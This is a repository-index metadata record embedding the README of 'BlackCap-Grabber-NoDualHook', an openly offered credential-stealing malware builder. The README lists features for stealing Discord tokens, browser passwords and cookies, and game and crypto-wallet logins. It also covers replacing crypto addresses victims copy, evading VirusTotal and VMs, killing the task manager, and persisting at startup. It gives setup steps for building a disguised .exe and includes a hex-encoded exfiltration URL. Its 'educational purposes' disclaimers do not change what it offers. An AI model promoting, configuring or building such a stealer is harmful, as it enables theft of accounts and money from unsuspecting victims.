{"id":28697608,"url":"https://github.com/systemvll/blackcap-grabber-nodualhook","last_synced_at":"2025-06-14T10:04:55.630Z","repository":{"id":103717363,"uuid":"594157369","full_name":"SystemVll/BlackCap-Grabber-NoDualHook","owner":"SystemVll","description":"The BlackCap Grabber without dual webhook stealer","archived":false,"fork":false,"pushed_at":"2025-04-28T15:26:06.000Z","size":36,"stargazers_count":132,"open_issues_count":5,"forks_count":22,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-06-10T22:43:59.264Z","etag":null,"topics":["advanced-token-logger","blackcap","discord-stealer","discord-token-grabber","discord-token-stealer","discordgrabber","discordtokengrabber","discordtokenstealerpasswordstealer","password-cracking","password-stealer","roblox","roblox-cookie-grabber","roblox-cookie-stealer","stealer","stealer-builder","stealer-undetected","token-grabber","token-logger","token-stealer","undetectable-token-grabber"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SystemVll.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2023-01-27T18:28:30.000Z","updated_at":"2025-06-08T20:16:42.000Z","dependencies_parsed_at":"2025-04-28T14:25:18.924Z","dependency_job_id":"59fe2366-4f79-47fd-81bd-5569524ab5e9","html_url":"https://github.com/SystemVll/BlackCap-Grabber-NoDualHook","commit_stats":null,"previous_names":["systemvll/blackcap-grabber-nodualhook","inplex-sys/blackcap-grabber-nodualhook"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/SystemVll/BlackCap-Grabber-NoDualHook","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SystemVll%2FBlackCap-Grabber-NoDualHook","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SystemVll%2FBlackCap-Grabber-NoDualHook/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SystemVll%2FBlackCap-Grabber-NoDualHook/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SystemVll%2FBlackCap-Grabber-NoDualHook/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SystemVll","download_url":"https://codeload.github.com/SystemVll/BlackCap-Grabber-NoDualHook/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SystemVll%2FBlackCap-Grabber-NoDualHook/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259797979,"owners_count":22912767,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["advanced-token-logger","blackcap","discord-stealer","discord-token-grabber","discord-token-stealer","discordgrabber","discordtokengrabber","discordtokenstealerpasswordstealer","password-cracking","password-stealer","roblox","roblox-cookie-grabber","roblox-cookie-stealer","stealer","stealer-builder","stealer-undetected","token-grabber","token-logger","token-stealer","undetectable-token-grabber"],"created_at":"2025-06-14T10:04:51.399Z","updated_at":"2025-06-14T10:04:55.622Z","avatar_url":"https://github.com/SystemVll.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Proofs that BlackCap-Grabber was a Dual Hook :\r\nAn investigation has uncovered that the `main.py` file in the BlackCap repository injects malicious nodejs code into the Discord `%APPDATA%/Discord/app-(versions)/modules/discord_desktop_core/index.js` module. The contents of the script can be found in another repository and are retrieved in the `main.py` file (see [link](https://github.com/KSCHdsc/BlackCap-Grabber/blob/main/main.py#L57)).\r\n\r\nThe `inject.js` file, which is executed by the main thread of Electron (Discord), is responsible for stealing the Discord session token and collecting various information about the victim. The attacker receives this information, but a copy is also sent to `https://login.blackcap-grabber.com:3000/premium/` using a `POST` method (see [link](https://github.com/KSCHdsc/BlackCap-Inject/blob/main/index.js#L20)) note that the url is encoded in hexadecimal and can be decoded by using console.log() \r\n```js\r\nconsole.log(\"\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x6c\\x6f\\x67\\x69\\x6e\\x2e\\x62\\x6c\\x61\\x63\\x6b\\x63\\x61\\x70\\x2d\\x67\\x72\\x61\\x62\\x62\\x65\\x72\\x2e\\x63\\x6f\\x6d\\x3a\\x33\\x30\\x30\\x30\\x2f\\x70\\x72\\x65\\x6d\\x69\\x75\\x6d\\x2f\")\r\n\r\nOUTPUT : https://login.blackcap-grabber.com:3000/premium/\r\n```\r\n\r\nA review of the code [link](https://github.com/KSCHdsc/BlackCap-Inject/blob/main/index.js#L186) reveals that we send the same HTTP request 2 times,\r\none time for `config.webhook` and one time for `config.uwu` who is the dualhook url.\r\n\r\n![](https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/Banner.png)\r\n\r\n**NOTE:** \r\n- BlackCap was made for educational purposes, there for all consequences caused by your actions are **your** responsibility and accountability.\r\n- You got an error? you've find a bug? Create an issue!\r\n\r\n---\r\n\r\n## \u003ca id=\"content\"\u003e\u003c/a\u003e🌐 〢 Content\r\n\r\n- [🎉・Setting up BlackCap](#setup)\r\n- [🔰・Features](#features)\r\n- [👁️・Features Explanation](#explanation)\r\n- [📝・Changelog](#changelog)\r\n- [🕵️‍♂️・Credits](#forkedfrom)\r\n- [💼・Term](#terms)\r\n\r\n\r\n## \u003ca id=\"setup\"\u003e\u003c/a\u003e 📁 〢 Setting up BlackCap\r\n\r\n1. Install [Python](https://www.python.org/ftp/python/3.10.0/python-3.10.0-amd64.exe)\r\n2. Install [BlackCap Files](https://github.com/SystemVll/BlackCap-Grabber-NoDualHook/archive/refs/heads/main.zip)\r\n3. Install all requirements [install.bat](https://github.com/SystemVll/BlackCap-Grabber-NoDualHook/blob/main/install.bat)\r\n4. Click on start.bat [start.bat](https://github.com/SystemVll/BlackCap-Grabber-NoDualHook/blob/main/start.bat)\r\n5. Complete the configuration\r\n6. You have your .exe file enjoy :)\r\n\r\n\r\n## \u003ca id=\"features\"\u003e\u003c/a\u003e🔰 〢 Features\r\n\r\n```diff\r\n\u003e Default:\r\n\r\n- Steal Steam / Minecraft / Metamask / Exodus / Roblox / NationGlory login\r\n- Steal Chrome Passwords / Cookies / History\r\n- Inject Discord / Discord Canary / Lightcord / Ripcord / Xcord\r\n- Debug Killer (Kill task gestionary)\r\n- Bypass TokenProtector / BetterDiscord\r\n- Take a Screenshot\r\n- Grabb System Informations\r\n- Bypass Virus Total machines\r\n- Bypass VM machines\r\n- Hide Itself in Background\r\n- Replace the BTC address copying by your\r\n- Custom Installer / Setuper\r\n- Icon / Name / Description Customizable\r\n- Cookies Exploiter Tech (💎)\r\n- Steal all Chromium Passwords and Cookies for OperaGX/Opera/GoogleChrome/Brave/Chromium/Torch/Edge/Mozilla and others\r\n- 0/64 Detect Virus Total Builder (.exe) (💎)\r\n- Grabb Sensitive Files exodus login / a2f backup codes / tokens / passwords... (can be customizable) (💎)\r\n\r\n\r\n\r\n\u003e Injection:\r\n\r\n- Nitro Auto Buy\r\n- First Start Reporter\r\n- New Passwords\r\n- New Emails\r\n- New Login\r\n- New Credit Card\r\n- New PayPal\r\n- Anti Delete system (re install after Discord uninstall / Discord Update)\r\n\u003e + More!\r\n```\r\n\r\n## \u003ca id=\"explanation\"\u003e\u003c/a\u003e👁️ 〢 Explanations of Features and options\r\n\r\n\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062467388320272504/image.png)\r\n```d\r\n@blackcap: Here put your Discord Webhook you can find it in your \r\n\"DISCORD CHANNEL OPTIONS\" \u003e \"INTEGRATION\" \u003e \"CREATE A WEBHOOK\"\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062467782446420049/image.png)\r\n```d\r\n@blackcap: Here put your final file name like who is not going to be obvious\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062468541967773756/image.png)\r\n```d\r\n@blackcap: This is a option to \"KILL\" all discord clients opened \r\nand to restart them with the blackcap injection \r\n(so i recommand \"yes\")\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062469117954768998/image.png)\r\n```d\r\n@blackcap: This is a option to \"KILL\" all process which could analyze the properties of blackcap, \r\nsuch as the task manager, the terminal or even analysis tools (so i recommand \"yes\")\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062469614036078642/image.png)\r\n```d\r\n@blackcap: This is a option to ping when someone run BlackCap you can specify \"everyone\" or \"here\"\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062470764609151016/image.png)\r\n```d\r\n@blackcap: This option replaces each of the crypto addresses copied by the victim with yours, \r\nit will not realize that it is not the same and during a payment the cryptomoney will be sent \r\nto your address\r\n\r\n//Yeah, that OP i know\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062471735582146630/image.png)\r\n```d\r\n@blackcap: If you chose 'yes' to the previous option you will have to fill in this with \r\nYOUR crypto wallet addresses \r\n(You can also put mine)👌\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062472209777574009/image.png)\r\n```d\r\n@blackcap: This option allows you to display an error message when someone launches your blackcap \r\nfor the moment it is a predefined message but later it will be customizable\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062472564078817330/image.png)\r\n```d\r\n@blackcap: This option will make a copy of the .exe in the windows startup of your victims and \r\nblackcap will therefore launch at each start\r\n\r\n(if you have activated the address crypto replacer I advise you to activate this one)\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062473429216919684/image.png)\r\n```d\r\n@blackcap: This option will close automatically the window that will launch blackcap \r\n(also works if you let the final file in .py so i recommand 'yes')\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062473970537992192/image.png)\r\n```d\r\n@blackcap: This option will obfuscate the source code \"BUT THIS OBFUSCATION WAS DETECTED\"\r\nI recommand to chose 'no'\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062474365079388201/image.png)\r\n```d\r\n@blackcap: This option will create an .exe if you put 'no' the final file will be an .py\r\n```\r\n![](https://media.discordapp.net/attachments/912038729626058853/1062474813135925288/image.png)\r\n```d\r\n@blackcap: If you chose 'yes' in the previous option this option will add an icon to your .exe\r\n```\r\n\r\n## \u003ca id=\"changelog\"\u003e\u003c/a\u003e💭 〢 ChangeLog\r\n\r\n```diff\r\nv1.9 ⋮ 2022-26-10\r\n- bug fix to search token\r\n- error message fixed\r\n- build with pyinstaller fixed\r\n\r\nv2.0 : 2022-30-10\r\n- enoent zipfile bug fixed\r\n+ Place .exe in startup\r\n+ Add Fake Error\r\n\r\nv2.1: 2022-30-10\r\n+ New builder\r\n+ Ping on run\r\n+ Task Manager killer\r\n\r\nv2.1.1: 2022-31-10\r\n- Builder correction\r\n+ Compacting Builder\r\n+ Add auto compressed build\r\n\r\nv2.2: 2022-31-10\r\n- Token Grabber Correction\r\n+ Grab all other Browsers\r\n+ CMD and gestionnary killer\r\n\r\n\r\nv2.2.5: 2022-14-11\r\n+ Detect New Discord Active Developer Badge\r\n\r\n\r\nv2.3: 2023-10-01\r\n- 0 detection source code by virustotal\r\n- Builder error patched\r\n+ New code optimisation\r\n+ New features can replace all crypto wallet by your address\r\n\r\nv2.3.5: 2023-20-01\r\n- Detect Patched\r\n- Builder .exe deleted patched\r\n\r\n\r\nv2.3.8: 2023-21-01\r\n- Text Encoder Bug Fixed\r\n+ New Cookies Format (Can be used by Cookie Quick Manager extension)\r\n\r\n\r\nv2.3.9: 2023-21-01\r\n+ AntiDebug More Powerfull (check ip)\r\n```\r\n\r\n### Contributors (CapingTeam)\r\n- SystemVll\r\n- Xenis\r\n- Nono1337\r\n- Irax212\r\n- Shamroks\r\n\r\n### \u003ca id=\"forkedfrom\"\u003e\u003c/a\u003e🕵️‍♂️ 〢 Forked From:\r\n- Hazard Grabber\r\n- PirateStealer\r\n- Wasp-stealer\r\n- Builder by Luna token grabber \r\n\r\n\r\n### \u003ca id=\"terms\"\u003e\u003c/a\u003e💼 〢 Terms Of Usage\r\n\r\n- [x] Educational purpose only\r\n- [x] Reselling is forbidden\r\n- [x] You can use the source code if you keep credits (in embed + in markdown), it has to be open-source\r\n- [x] We are NOT responsible of anything you do with our software (if its illegal)\r\n\r\n\r\n\u003ca href=#top\u003eBack to Top\u003c/a\u003e\u003c/p\u003e\r\n![](https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/mona-loading-dark.gif)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsystemvll%2Fblackcap-grabber-nodualhook","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsystemvll%2Fblackcap-grabber-nodualhook","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsystemvll%2Fblackcap-grabber-nodualhook/lists"}